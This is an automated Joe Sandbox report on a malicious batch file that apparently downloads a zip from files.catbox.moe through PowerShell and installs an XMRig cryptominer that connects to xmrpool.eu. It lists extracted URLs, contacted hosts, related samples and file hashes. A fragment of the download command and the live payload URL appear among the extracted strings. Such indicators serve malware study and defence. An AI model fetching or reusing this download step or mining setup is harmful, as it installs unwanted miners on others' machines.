                                                                                                              http://docs.python.org/3/license.htmlpowershell.exe, 00000009.00000002.1946719482.0000023681C89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://dynamic.tsvchost.exe, 00000000.00000003.1368314641.000002728C275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tools.ietf.org/html/rfc6125#section-6.4.3powershell.exe, 00000009.00000002.1946719482.0000023681C89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681AEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681AF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C7C000.00000004.00000800.00020000.00000000.sdmp, ssl_match_hostname.cpython-312.pyc.9.drfalse
                                                                                                                    high
                                                                                                                    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://urllib3.readthedocs.io/en/latest/sponsors.html).powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://github.com/sigmavirus24)powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://google.com/mailpowershell.exe, 00000009.00000002.1946719482.00000236815BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236815C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368197E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681988000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://xmrig.com/benchmark/%sxmrig.exe, 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/urllib3/urllib3/pull/3024powershell.exe, 00000009.00000002.1946719482.0000023681C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/koenvo/pyodide-http/issues/22powershell.exe, 00000009.00000002.1946719482.000002368185F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681854000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.powershell.exe, 00000009.00000002.1946719482.00000236819C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236815DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000000.00000002.1372125562.000002728C270000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369059845.000002728C26E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000000.00000003.1369757208.000002728C231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369463556.000002728C262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372077351.000002728C263000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://static.docs.arm.com/ihi0044/g/aaelf32.pdfpowershell.exe, 00000009.00000002.1946719482.0000023682337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682343000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://files.catbox.moe/d6pvcr.zip-OutFilefun.zip;Add-Type-AssemblySystem.IO.Compression.Filesystempowershell.exe, 00000009.00000002.2039838656.00000236FBB50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://github.com/theacodes)powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/powershell.exe, 00000009.00000002.1946719482.00000236816AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://github.com/urllib3/urllib3/issues/651powershell.exe, 00000009.00000002.1946719482.00000236816AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.htmlpowershell.exe, 00000009.00000002.1946719482.00000236816AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681688000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=referralpowershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/urllib3/urllib3/issues/2920powershell.exe, 00000009.00000002.1946719482.00000236815BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236815C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368197E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681988000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://discord.gg/urllib3)powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000000.00000002.1371933085.000002728C22B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://pypi.org/p/twine)zregister.cpython-312.pyc.9.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.pyopenssl.orgpowershell.exe, 00000009.00000002.1946719482.0000023681703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236818B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368170C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236818C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://github.com/urllib3/urllib3/issuespowershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://setuptools.pypa.io/en/stable/history.htmlpowershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://github.com/shazow)powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000000.00000002.1372104101.000002728C268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1371933085.000002728C22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369418188.000002728C267000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://readthedocs.org/projects/urllib3/badge/?version=latestpowershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbcapowershell.exe, 00000009.00000002.1946719482.0000023682184000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368218D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://pypi.org/project/setuptools/powershell.exe, 00000009.00000002.1946719482.000002368075D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368073B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://img.shields.io/discord/803025117553754132powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000000.00000002.1372145591.000002728C277000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1368314641.000002728C275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://github.com/pquentin)powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000000.00000002.1371951064.000002728C238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1371978908.000002728C242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000000.00000003.1369463556.000002728C262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372077351.000002728C263000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://twitter.com/powershell.exe, 00000009.00000002.1946719482.00000236815BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236815C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368197E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681988000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://setuptools.pypa.io/powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://discord.com/channels/803025117553754132/815945031150993468powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://google.com/mail/powershell.exe, 00000009.00000002.1946719482.0000023681CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://urllib3.readthedocs.iopowershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000000.00000002.1371978908.000002728C242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://google.com/mail/url.cpython-312.pyc.9.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://github.com/pypa/setuptools/actions/workflows/main.yml/badge.svgpowershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://hdl.handle.net/1895.22/1013powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://github.com/python/cpython/issues/59999powershell.exe, 00000009.00000002.1946719482.00000236820A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236820B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://tidelift.com/badges/github/pypa/setuptools?style=flatpowershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://www.openssl.org/Hpowershell.exe, 00000009.00000002.1946719482.00000236807BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236809FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                      51.89.217.80
                                                                                                                                                                                                      xmrpool.euFrance
                                                                                                                                                                                                      16276OVHFRfalse
                                                                                                                                                                                                      108.181.20.35
                                                                                                                                                                                                      files.catbox.moeCanada
                                                                                                                                                                                                      852ASN852CAfalse
                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                      Analysis ID:1569814
                                                                                                                                                                                                      Start date and time:2024-12-06 10:24:56 +01:00
                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                      Overall analysis duration:0h 11m 31s
                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                      Number of analysed new started processes analysed:31
                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                      Sample name:2zirzlMVqX.bat
                                                                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                                                                      Original Sample Name:6ef6ab582b21c376ef719396f9fe2205.bat
                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                      Classification:mal100.evad.mine.winBAT@41/1055@4/2
                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                      • Successful, ratio: 33.3%
                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                      • Successful, ratio: 72%
                                                                                                                                                                                                      • Number of executed functions: 69
                                                                                                                                                                                                      • Number of non-executed functions: 113
                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                      • Found application associated with file extension: .bat
                                                                                                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 40.81.94.65
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 2724 because it is empty
                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7096 because it is empty
                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7196 because it is empty
                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7292 because it is empty
                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                      • VT rate limit hit for: 2zirzlMVqX.bat
                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                      04:25:53API Interceptor246x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                      06:21:04API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      51.89.217.80jKkDc50MRn.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                        ye6eow5tNk.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                          b5OyySwWKr.exeGet hashmaliciousAsyncRAT, DarkTortilla, PhoenixRAT, XmrigBrowse
                                                                                                                                                                                                            libexecGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              svchost.exeGet hashmaliciousBitCoin Miner SilentXMRMiner XmrigBrowse
                                                                                                                                                                                                                108.181.20.35Document.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • files.catbox.moe/p1yr9i.pdf
                                                                                                                                                                                                                SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msiGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                • files.catbox.moe/nzct1p
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                xmrpool.eujKkDc50MRn.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                • 51.89.217.80
                                                                                                                                                                                                                ye6eow5tNk.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                • 51.89.217.80
                                                                                                                                                                                                                b5OyySwWKr.exeGet hashmaliciousAsyncRAT, DarkTortilla, PhoenixRAT, XmrigBrowse
                                                                                                                                                                                                                • 51.89.217.80
                                                                                                                                                                                                                apache2Get hashmaliciousFritzFrogBrowse
                                                                                                                                                                                                                • 51.75.146.174
                                                                                                                                                                                                                ncGet hashmaliciousFritzFrogBrowse
                                                                                                                                                                                                                • 51.75.146.174
                                                                                                                                                                                                                svchost.exeGet hashmaliciousBitCoin Miner SilentXMRMiner XmrigBrowse
                                                                                                                                                                                                                • 51.89.217.80
                                                                                                                                                                                                                files.catbox.moeQwLii5vouB.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                PO Huaruicarbon 98718.htmlGet hashmaliciousCorporateDataTheft, HTMLPhisherBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                5QnwxSJVyX.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                https://drive.google.com/uc?export=download&id=11w_oRLtDWJl2z1SKN0zkobTHd_Ix44t9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                https://files.catbox.moe/iz3lne.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                ASN852CAbin.sh.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 205.151.243.120
                                                                                                                                                                                                                lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                • 108.181.189.7
                                                                                                                                                                                                                New quotation request.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                • 108.181.189.7
                                                                                                                                                                                                                arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                • 209.121.181.111
                                                                                                                                                                                                                sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                • 104.205.180.143
                                                                                                                                                                                                                Qsgtknmtt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 108.181.20.36
                                                                                                                                                                                                                Fzcaaz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 108.181.20.36
                                                                                                                                                                                                                Ekyrfzxogk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 108.181.20.36
                                                                                                                                                                                                                Qsgtknmtt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 108.181.20.36
                                                                                                                                                                                                                Fzcaaz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 108.181.20.36
                                                                                                                                                                                                                OVHFRmain_x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 151.80.169.13
                                                                                                                                                                                                                https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 5.196.111.73
                                                                                                                                                                                                                https://sendgb.com/dxukcl49bIj?utm_medium=mvC3BJ1YMhqe8znGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                • 51.89.9.254
                                                                                                                                                                                                                Opportunity Offering Pure Home Improvement Unique Guest Post Websites A... (107Ko).msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 91.134.110.133
                                                                                                                                                                                                                v1.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                • 164.132.5.117
                                                                                                                                                                                                                https://indiollanero7nudos.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 198.27.126.63
                                                                                                                                                                                                                teste.m68k.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                                                                                                                                                                • 139.99.9.192
                                                                                                                                                                                                                sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 167.114.164.95
                                                                                                                                                                                                                teste.arm7.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                                                                                                                • 188.165.198.160
                                                                                                                                                                                                                https://google.com/amp/s/fundosofia.com%2Felincrms%2Fcdmhcms%2FG%2Fcm9oYXJhQGJhcnRvbmFzc29jaWF0ZXMuY29tGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                • 167.114.27.228
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0ee2mzbWePHw.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                datXObAAn1.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                EeXJoO1J62.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                gcrY4QgzW9.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                datXObAAn1.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                XZaysgiUfm.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                EeXJoO1J62.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                gcrY4QgzW9.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                XZaysgiUfm.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                • 108.181.20.35
                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                C:\ProgramData\.logstxt\nssm.exe (copy)SecuriteInfo.com.Trojan.Siggen29.1091.20762.15518.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.Siggen29.1091.19313.13427.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                    #U9644#U4ef6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      #U9644#U4ef6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        SecuriteInfo.com.PUA.Tool.Nssm.6.15973.27062.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          rapV1.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                            W0GMc7Catw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):388
                                                                                                                                                                                                                              Entropy (8bit):4.695996037746329
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:XqT6eVQMH6iM+kQgYUoVAA+JL4erzsiAadDuYHit8LOPFkr:XqT6whkI8L4erLTdD/zLRr
                                                                                                                                                                                                                              MD5:76689EE509335B1E13050DBD78C9E08C
                                                                                                                                                                                                                              SHA1:ADF41F06B8C62CFD67954986B41F67A8576B3E75
                                                                                                                                                                                                                              SHA-256:B799B50DD50BB3015F6D924CFA979DEE0B235D1338EAC2EF9B3ABC75B70C07EF
                                                                                                                                                                                                                              SHA-512:B8793ED557E5E544C9367C7F315DCDB37D6260611540400A8E84D26C43521C43B8414C74F2FAEC30B98BCE5EC48585B26BAA092D5AFA7DF8615740FC280E5AAD
                                                                                                                                                                                                                              Malicious:false
